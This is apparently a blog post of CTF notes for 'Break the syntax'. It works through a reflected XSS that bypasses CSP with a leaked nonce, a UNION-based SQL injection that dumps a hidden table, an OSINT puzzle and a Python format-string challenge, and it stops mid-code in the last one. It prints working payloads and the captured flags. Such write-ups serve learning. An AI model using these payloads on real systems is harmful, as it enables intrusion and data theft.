<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Break the syntax" /><meta name="author" content="mediocre_one" /><meta property="og:locale" content="en_US" /><meta name="description" content="Break the syntax CTF notes" /><meta property="og:description" content="Break the syntax CTF notes" /><link rel="canonical" href="mediocreone.com/2021/03/14/break-the-syntax" /><meta property="og:url" content="mediocreone.com/2021/03/14/break-the-syntax" /><meta property="og:site_name" content="Just a blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-03-14T00:00:00+00:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Break the syntax" /><meta name="twitter:site" content="@mediocre_one" /><meta name="twitter:creator" content="@mediocre_one" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"mediocre_one"},"description":"Break the syntax CTF notes","mainEntityOfPage":{"@type":"WebPage","@id":"mediocreone.com/2021/03/14/break-the-syntax"},"@type":"BlogPosting","url":"mediocreone.com/2021/03/14/break-the-syntax","headline":"Break the syntax","dateModified":"2021-03-14T00:00:00+00:00","datePublished":"2021-03-14T00:00:00+00:00","@context":"https://schema.org"}</script><title> Break the syntax - Just a blog</title><link rel="shortcut icon" href="/favicon.png"><link rel="alternate" type="application/atom+xml" title="Just a blog" href="/atom.xml"><link rel="alternate" type="application/json" title="Just a blog" href="mediocreone.com/feed.json" /><link rel="sitemap" type="application/xml" title="sitemap" href="/sitemap.xml" /><style> .highlight .hll{background-color:#ffffcc}.highlight .c{color:#808080}.highlight .err{color:#F00000;background-color:#F0A0A0}.highlight .k{color:#008000;font-weight:bold}.highlight .o{color:#303030}.highlight .cm{color:#808080}.highlight .cp{color:#507090}.highlight .c1{color:#808080}.highlight .cs{color:#cc0000;font-weight:bold}.highlight .gd{color:#A00000}.highlight .ge{font-style:italic}.highlight .gr{color:#FF0000}.highlight .gh{color:#000080;font-weight:bold}.highlight .gi{color:#00A000}.highlight .go{color:#808080}.highlight .gp{color:#c65d09;font-weight:bold}.highlight .gs{font-weight:bold}.highlight .gu{color:#800080;font-weight:bold}.highlight .gt{color:#0040D0}.highlight .kc,.highlight .kd,.highlight .kn{color:#008000;font-weight:bold}.highlight .kp{color:#003080;font-weight:bold}.highlight .kr{color:#008000;font-weight:bold}.highlight .kt{color:#303090;font-weight:bold}.highlight .m{color:#6000E0;font-weight:bold}.highlight .s{background-color:#fff0f0}.highlight .na{color:#0000C0}.highlight .nb{color:#007020}.highlight .nc{color:#B00060;font-weight:bold}.highlight .no{color:#003060;font-weight:bold}.highlight .nd{color:#505050;font-weight:bold}.highlight .ni{color:#800000;font-weight:bold}.highlight .ne{color:#F00000;font-weight:bold}.highlight .nf{color:#0060B0;font-weight:bold}.highlight .nl{color:#907000;font-weight:bold}.highlight .nn{color:#0e84b5;font-weight:bold}.highlight .nt{color:#007000}.highlight .nv{color:#906030}.highlight .ow{color:#000000;font-weight:bold}.highlight .w{color:#bbbbbb}.highlight .mf{color:#6000E0;font-weight:bold}.highlight .mh{color:#005080;font-weight:bold}.highlight .mi{color:#0000D0;font-weight:bold}.highlight .mo{color:#4000E0;font-weight:bold}.highlight .sb{background-color:#fff0f0}.highlight .sc{color:#0040D0}.highlight .sd{color:#D04020}.highlight .s2{background-color:#fff0f0}.highlight .se{color:#606060;font-weight:bold;background-color:#fff0f0}.highlight .sh{background-color:#fff0f0}.highlight .si{background-color:#e0e0e0}.highlight .sx{color:#D02000;background-color:#fff0f0}.highlight .sr{color:#000000;background-color:#fff0ff}.highlight .s1{background-color:#fff0f0}.highlight .ss{color:#A06000}.highlight .bp{color:#007020}.highlight .vc{color:#306090}.highlight .vg{color:#d07000;font-weight:bold}.highlight .vi{color:#3030B0}.highlight .il{color:#0000D0;font-weight:bold}*,:after,:before{box-sizing:border-box;background-color:inherit;color:inherit;margin:0;padding:0}body{font-family:system-ui, sans-serif;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;line-height:1.5;font-size:1rem;color:#16171a}nav ul{border-right:1px solid #edf2f7}a{color:#000;text-decoration-skip-ink:auto;text-decoration:underline}pre{margin:0.5rem 0;padding:0.5rem}.post p{margin:0.5rem 0}.post h1,.post h2,.post h3,.post h4{margin:1rem 0}.post h2:first-child,.project h2:first-child,.photo h2:first-child{margin-top:0}.meta{margin:2rem 0}code,pre{background:#ecedee}code{padding:0.1rem}pre code{border:none}pre{padding:1rem;overflow-x:auto}img{max-width:100%}hr{background:#000;height:1px;border:0}header{flex-basis:10rem;flex-grow:1;position:relative}header a{text-decoration:none}header li{margin-bottom:0.2rem;text-align:right;margin-right:2rem}header a.active{font-weight:bold}header,section{padding:1rem}blockquote{font-style:italic;border-left:5px solid #ececec;padding-left:1rem}h1,h2,h3,h4,h5{line-height:1;margin:1rem 0;font-weight:600}section h1:first-child{margin-top:0}strong,b{font-weight:bold}.photos ul{list-style:none}.photos li{margin-bottom:1.5rem}.photo picture,.project picture{margin-bottom:0.5rem}.posts ul,header ul{list-style:none}.posts li{align-items:center;display:flex;justify-content:space-between;margin-bottom:0.5rem}.posts li a,.posts li div,.projects li a{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;text-decoration:none}.posts li time,.projects li time{padding-left:1rem;white-space:nowrap;font-variant-numeric:tabular-nums}main{display:flex;flex-wrap:wrap;max-width:60rem;margin:2rem auto;padding:1rem}@media screen and (max-width: 45rem){header li{display:inline;margin-right:1rem}.logo{padding-bottom:1rem}header ul{border-bottom:1px solid #edf2f7;padding-bottom:2rem}nav ul{border-right:0px}.photos ul{margin-top:0.5rem}}section{flex-basis:0;flex-grow:999;min-width:70%;display:flex;flex-direction:column}figcaption{font-size:smaller}.right1,.networth dd span,.networth .total span,.networth .total small,.networth .expiration .note{float:right;margin-right:1em}.networth{margin-top:40px;border-right:1px solid #edf2f7}.networth dt,.networth .date{text-align:right;margin-right:2rem}.networth .total{margin-top:20px;padding-bottom:20px}.expiration{margin-top:30px}</style></head><body><main role="main"><header role="banner"> <!--<h1 class="logo">Just a blog</h1>--><nav role="navigation"><ul><li><a href="/" >Writing</a></li><li><a href="/about" >About</a></li><li><a href="/search" >Search</a></li><li><a href="/atom.xml" >Rss</a></li></ul></nav><div class="networth"><dl><dt><u>Assets</u></dt><dd>- home <span class="amount">18.0k</span></dd><dd>- device(s) <span class="amount">1.0k</span></dd><dd>- stock(s) <span class="amount">2.0k</span></dd><dd>- cash <span class="amount">0.8k</span></dd><dt><u>Liabilities</u></dt><dd>- debt <span class="amount">3.5k</span></dd><dd>- loan <span class="amount">1.4k</span></dd></dl><div class="total"> <b><span>My Net: 16.9k</span></b> </br> <small>02-05-2021</small></div></div><script> const format = (x) => (x < 10) ? "0" + x : x; setInterval(() => { let delta = (new Date("2055/12/31") - new Date()) / 1000; const days = delta / 86400 | 0; document.getElementById('days').innerHTML = days; delta -= days * 86400; const hours = (delta / 3600 | 0) % 24; document.getElementById('hours').innerHTML = format(hours); delta -= hours * 3600; const minutes = (delta / 60 | 0) % 60; document.getElementById('mins').innerHTML = `:${format(minutes)}:`; delta -= minutes * 60; document.getElementById('secs').innerHTML = format((delta % 60) | 0); }, 1000); </script><div class="expiration"> <span class="right1">Expired by:</span></br> <span class="right1"> <span id="days"></span> <span id="hours"></span><span id="mins"></span><span id="secs"></span> </span></div></header><section class="post"><h2>Break the syntax</h2><p>It’s has been a while since I played CTF games. Anyway, I share my struggles as an amateur player.</p><h3 id="1-web-challenge---never-gonna-give-you-flag">1. Web challenge - Never gonna give you flag</h3><p><img src="/assets/img/never-gonna-give-you-flag.png" alt="Landing page" /></p><p>This landing page contained 6 links where 2 of them contained below interesting codes.</p><div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;&lt;script </span><span class="na">src=</span><span class="s">"jquery-3.5.1.min.js"</span><span class="nt">&gt;&lt;/script&gt;&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
  <span class="nt">&lt;div&gt;</span> Rick never gonna: <span class="nt">&lt;/div&gt;</span>
  <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"rick-says"</span><span class="nt">&gt;</span>
  <span class="nt">&lt;/p&gt;</span>
  <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"images/rick6.jpg"</span><span class="nt">&gt;</span>

  <span class="nt">&lt;script </span><span class="na">nonce=</span><span class="s">"JIYr435smMmKG1nAAFNlrKUewAEaTWt1"</span><span class="nt">&gt;</span>
    <span class="kd">var</span> <span class="nx">arg</span> <span class="o">=</span> <span class="nb">decodeURIComponent</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">1</span><span class="p">).</span><span class="nx">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">=</span><span class="dl">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]);</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">arg</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">undefined</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span>
      <span class="nx">$</span><span class="p">(</span><span class="dl">'</span><span class="s1">#rick-says</span><span class="dl">'</span><span class="p">).</span><span class="nx">append</span><span class="p">(</span><span class="nx">arg</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="c1">//console.log(arg)</span>
  <span class="nt">&lt;/script&gt;</span>

<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div><div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;&lt;script </span><span class="na">src=</span><span class="s">"jquery-3.5.1.min.js"</span><span class="nt">&gt;&lt;/script&gt;&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
  <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"images/rick2.jpg"</span> <span class="na">nonce=</span><span class="s">"JIYr435smMmKG1nAAFNlrKUewAEaTWt1"</span><span class="nt">&gt;</span>

  <span class="nt">&lt;script </span><span class="na">nonce=</span><span class="s">"JIYr435smMmKG1nAAFNlrKUewAEaTWt1"</span><span class="nt">&gt;</span>
    <span class="nx">$</span><span class="p">.</span><span class="nx">ajax</span><span class="p">({</span>
      <span class="na">url</span><span class="p">:</span> <span class="dl">"</span><span class="s2">flag.php</span><span class="dl">"</span><span class="p">,</span>
      <span class="na">headers</span><span class="p">:</span> <span class="p">{</span>
        <span class="dl">"</span><span class="s2">Nonce</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">JIYr435smMmKG1nAAFNlrKUewAEaTWt1</span><span class="dl">"</span>
      <span class="p">},</span>
      <span class="na">success</span><span class="p">:</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">result</span><span class="p">);</span>
      <span class="p">}</span>
    <span class="p">});</span>
  <span class="nt">&lt;/script&gt;</span>

<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div><p>The first page exposed XSS vulnerability and the second one hinted toward the flag. My first task was to successfully get <code class="language-plaintext highlighter-rouge">XSS!</code> message in the developer console.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./Never_gonna_say_goodbye.html?search=&lt;script&gt;console.log("XSS!")&lt;/script&gt;
</code></pre></div></div><p>This attempt threw a Content Security Policy error in the developer console. So fixed it with my second try.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./Never_gonna_say_goodbye.html?search=&lt;script nonce="JIYr435smMmKG1nAAFNlrKUewAEaTWt1"&gt;console.log("XSS!")&lt;/script&gt;
</code></pre></div></div><p>The previous error was gone but the <code class="language-plaintext highlighter-rouge">arg</code> variable held only <code class="language-plaintext highlighter-rouge">&lt;script nonce</code> part from my payload. So replaced <code class="language-plaintext highlighter-rouge">=</code> sign with <code class="language-plaintext highlighter-rouge">%3D</code> to get around the split.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./Never_gonna_say_goodbye.html?search=&lt;script nonce%3D"JIYr435smMmKG1nAAFNlrKUewAEaTWt1"&gt;console.log("XSS!")&lt;/script&gt;
</code></pre></div></div><p>Finally, the “XSS!” message arrived in the dev console. Good to go for the flag.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./Never_gonna_say_goodbye.html?search=&lt;script nonce%3D"JIYr435smMmKG1nAAFNlrKUewAEaTWt1"&gt;$.ajax({ url: "flag.php", headers: { "Nonce": "JIYr435smMmKG1nAAFNlrKUewAEaTWt1" }, success: function (r) { console.log(r); } });&lt;/script&gt;
</code></pre></div></div><p>The flag received in the dev console: <code class="language-plaintext highlighter-rouge">BtS-CTF{r1cK_g4v3_uP_y0ure_h3lpl3ss}</code>.</p><hr /><h3 id="2-web-challenge---cheated-lottery">2. Web challenge - Cheated lottery</h3><p><img src="/assets/img/cheated-lottery.png" alt="Landing page" /> The landing page source hinted at the <code class="language-plaintext highlighter-rouge">/?source=1</code> endpoint that contained the server-side code.</p><div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span> 
<span class="kn">from</span> <span class="nn">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> 
<span class="kn">import</span> <span class="nn">mysql.connector</span> 
<span class="kn">import</span> <span class="nn">os</span> 
<span class="n">load_dotenv</span><span class="p">()</span> 
<span class="k">def</span> <span class="nf">get_coupons</span><span class="p">(</span><span class="n">form</span><span class="p">):</span>
  <span class="n">coupons</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
  <span class="n">mydb</span> <span class="o">=</span> <span class="n">mysql</span><span class="p">.</span><span class="n">connector</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span> <span class="n">host</span><span class="o">=</span><span class="n">os</span><span class="p">.</span><span class="n">getenv</span><span class="p">(</span><span class="s">'mysql_host'</span><span class="p">),</span> <span class="n">user</span><span class="o">=</span><span class="n">os</span><span class="p">.</span><span class="n">getenv</span><span class="p">(</span><span class="s">'mysql_user'</span><span class="p">),</span> <span class="n">password</span><span class="o">=</span><span class="n">os</span><span class="p">.</span><span class="n">getenv</span><span class="p">(</span><span class="s">'mysql_pwd'</span><span class="p">),</span> <span class="n">database</span><span class="o">=</span><span class="n">os</span><span class="p">.</span><span class="n">getenv</span><span class="p">(</span><span class="s">'mysql_db'</span><span class="p">)</span> <span class="p">)</span> <span class="n">mycursor</span> <span class="o">=</span> <span class="n">mydb</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
  <span class="k">try</span><span class="p">:</span>
    <span class="n">mycursor</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT * FROM coupons WHERE code = '"</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">form</span><span class="p">[</span><span class="s">'cid'</span><span class="p">])</span> <span class="o">+</span> <span class="s">"'"</span><span class="p">)</span>
  <span class="k">except</span><span class="p">:</span>
    <span class="k">pass</span>
      <span class="n">myresult</span> <span class="o">=</span> <span class="n">mycursor</span><span class="p">.</span><span class="n">fetchall</span><span class="p">()</span>
      <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">myresult</span><span class="p">:</span>
        <span class="n">coupons</span><span class="p">.</span><span class="n">append</span><span class="p">({</span> <span class="s">'code'</span><span class="p">:</span> <span class="n">x</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'value'</span><span class="p">:</span> <span class="n">x</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="p">})</span>
        <span class="n">mycursor</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">coupons</span>

<span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span>
<span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">'/'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">'POST'</span><span class="p">,</span> <span class="s">'GET'</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">index</span><span class="p">(</span><span class="n">source</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
  <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">"POST"</span><span class="p">:</span>
    <span class="n">coupons</span> <span class="o">=</span> <span class="n">get_coupons</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">coupons</span> <span class="o">==</span> <span class="p">[]:</span>
      <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'list.html'</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="s">"Sorry, you didn't win"</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
      <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'list.html'</span><span class="p">,</span> <span class="n">coupons</span><span class="o">=</span><span class="n">coupons</span><span class="p">)</span>
  <span class="k">else</span><span class="p">:</span>
    <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'source'</span><span class="p">)</span> <span class="o">==</span> <span class="s">'1'</span><span class="p">:</span>
      <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">__file__</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">r</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">r</span><span class="p">.</span><span class="n">read</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
      <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">'base.html'</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
  <span class="n">app</span><span class="p">.</span><span class="n">run</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">"0.0.0.0"</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="mi">7331</span><span class="p">)</span>
</code></pre></div></div><p>The code section to query MySQL database is intentionally left exposed to SQL Injections.</p><div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap <span class="nt">-r</span> ./request.txt <span class="nt">-p</span> cid
</code></pre></div></div><p>The SQLmap tool reported that <code class="language-plaintext highlighter-rouge">UNION attack</code> with 3 columns is the way to go. My first injection was for acquiring the database name: <code class="language-plaintext highlighter-rouge">test' UNION SELECT DATABASE(), DATABASE(), DATABASE() WHERE 'x' = 'x</code><br /> The actual executed query becomes:</p><div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">coupons</span> <span class="k">WHERE</span> <span class="n">code</span> <span class="o">=</span> <span class="s1">'test'</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="k">DATABASE</span><span class="p">(),</span> <span class="k">DATABASE</span><span class="p">(),</span> <span class="k">DATABASE</span><span class="p">()</span> <span class="k">WHERE</span> <span class="s1">'x'</span> <span class="o">=</span> <span class="s1">'x'</span>
</code></pre></div></div><p>Received the database name as <code class="language-plaintext highlighter-rouge">ff86e476b1344851f095759d1eeccda72d9363ad</code>. The second injection was to list all tables in this database: <code class="language-plaintext highlighter-rouge">test' UNION SELECT NULL, table_name, table_type FROM information_schema.tables WHERE 'x' = 'x</code><br /> The correctly executed query becomes:</p><div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">coupons</span> <span class="k">WHERE</span> <span class="n">code</span> <span class="o">=</span> <span class="s1">'test'</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="k">NULL</span><span class="p">,</span> <span class="k">table_name</span><span class="p">,</span> <span class="n">table_type</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span> <span class="k">WHERE</span> <span class="s1">'x'</span> <span class="o">=</span> <span class="s1">'x'</span>
</code></pre></div></div><p>Revealed table names were <code class="language-plaintext highlighter-rouge">c2VjcmV0LWRi</code> and <code class="language-plaintext highlighter-rouge">coupons</code>. The third injection was to get column names of the <code class="language-plaintext highlighter-rouge">c2VjcmV0LWRi</code> table: <code class="language-plaintext highlighter-rouge">test' UNION SELECT NULL, column_name, column_name FROM information_schema.columns WHERE table_schema = 'ff86e476b1344851f095759d1eeccda72d9363ad' AND table_name = 'c2VjcmV0LWRi</code> <br /> The correctly executed query becomes:</p><div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">coupons</span> <span class="k">WHERE</span> <span class="n">code</span> <span class="o">=</span> <span class="s1">'test'</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="k">NULL</span><span class="p">,</span> <span class="k">column_name</span><span class="p">,</span> <span class="k">column_name</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="n">table_schema</span>  <span class="o">=</span> <span class="s1">'ff86e476b1344851f095759d1eeccda72d9363ad'</span> <span class="k">AND</span> <span class="k">table_name</span> <span class="o">=</span> <span class="s1">'c2VjcmV0LWRi'</span>
</code></pre></div></div><p>Revealed only one column named <code class="language-plaintext highlighter-rouge">ZGVmaW5pdGVseS1ub3QtZmxhZw</code>. The fourth injection explored the data of the <code class="language-plaintext highlighter-rouge">c2VjcmV0LWRi</code> table: <code class="language-plaintext highlighter-rouge">test' UNION SELECT NULL, ZGVmaW5pdGVseS1ub3QtZmxhZw, ZGVmaW5pdGVseS1ub3QtZmxhZw FROM c2VjcmV0LWRi WHERE 'x' = 'x</code><br /> The correctly executed query becomes:</p><div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">coupons</span> <span class="k">WHERE</span> <span class="n">code</span> <span class="o">=</span> <span class="s1">'test'</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">ZGVmaW5pdGVseS1ub3QtZmxhZw</span><span class="p">,</span> <span class="n">ZGVmaW5pdGVseS1ub3QtZmxhZw</span> <span class="k">FROM</span> <span class="n">c2VjcmV0LWRi</span> <span class="k">WHERE</span> <span class="s1">'x'</span> <span class="o">=</span> <span class="s1">'x'</span>
</code></pre></div></div><p>The flag <code class="language-plaintext highlighter-rouge">BtS-CTF{7h475_h0w_y0u_ch347_1n_94m35}</code> was only thing in table <code class="language-plaintext highlighter-rouge">c2VjcmV0LWRi</code>.</p><hr /><h3 id="3-osint-challenge---lost-photos">3. OSINT challenge - Lost Photos</h3><blockquote><p>God! All my photos from Moscow are gone, Hard disk had some problems, Usually it happens to my friends, Not to me, Thomas Garminas will be so upset. PS.: When you find what you are looking for, just put it between curly brackets and win this challenge</p></blockquote><p><img src="/assets/img/lost-photos.png" alt="Google Thomas Garminas" /> <img src="/assets/img/lost-photos-1.png" alt="Thomas Garminas - Youtube channel" /> Submitting <code class="language-plaintext highlighter-rouge">BtS-CTF{02.12.2017}</code> failed. I was afraid that the flag might be in this silent video.</p><p><img src="/assets/img/lost-photos-2.png" alt="Google Thomas Garminas - Firefox" /> <img src="/assets/img/lost-photos-3.png" alt="Google concert 02.12.2017 - Firefox" /> By luck, Firefox saved the day. Chrome was not showing the hint. <code class="language-plaintext highlighter-rouge">BtS-CTF{Amaranthe}</code> - accepted.</p><hr /><h3 id="4-misc-challenge---simple-game-calculator">4. Misc challenge - Simple game calculator</h3><p>A simple python game source code was exposed via the debug option.</p><div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span><span class="p">,</span> <span class="n">sys</span>

<span class="k">class</span> <span class="nc">Multiplayer</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">difficulty</span><span class="p">,</span> <span class="n">players</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">difficulty</span> <span class="o">=</span> <span class="s">"easy"</span> <span class="c1"># No one will create hard game, no need to implement it
</span>        <span class="bp">self</span><span class="p">.</span><span class="n">players</span> <span class="o">=</span> <span class="n">players</span>

    <span class="k">def</span> <span class="nf">show_details</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">'{0.players} can play this easy game called'</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">name</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>

<span class="k">class</span> <span class="nc">CTFGame</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">flag</span> <span class="o">=</span> <span class="s">"asd"</span>

<span class="n">games</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'multi'</span><span class="p">:</span> <span class="nb">list</span><span class="p">()</span>
<span class="p">}</span>

<span class="k">def</span> <span class="nf">user_choice</span><span class="p">():</span>
    <span class="n">menu</span> <span class="o">=</span> <span class="s">"""
    Welcome to Simple Game Creator where you can create your game of choice!

    1. View all games
    2. Create your own multiplayer game
    """</span>
    <span class="k">print</span><span class="p">(</span><span class="n">menu</span><span class="p">)</span>

    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"Choose wisely &gt;&gt; "</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">readline</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">add_multi</span><span class="p">():</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"Name your own multiplayer game &gt;&gt; "</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
    <span class="n">name</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">readline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"What difficulty will it have (hard, easy)? &gt;&gt; "</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
    <span class="n">diff</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">readline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"How many players can play this? &gt;&gt; "</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
    <span class="n">players</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">.</span><span class="n">readline</span><span class="p">().</span><span class="n">strip</span><span class="p">()</span>

    <span class="n">games</span><span class="p">[</span><span class="s">'multi'</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">Multiplayer</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">diff</span><span class="p">,</span> <span class="n">players</span><span class="p">))</span>

    <span class="k">print</span><span class="p">(</span><span class="s">"You created your own multiplayer game"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">show_games</span><span class="p">():</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Your games: "</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Multiplayers: "</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">multi</span> <span class="ow">in</span> <span class="n">games</span><span class="p">[</span><span class="s">'multi'</span><span class="p">]:</span>
        <span class="n">multi</span><span class="p">.</span><span class="n">show_details</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">""</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">banner</span> <span class="o">=</span> <span class="s">"""Banner"""</span>

    <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">banner</span><span class="p">)</span>
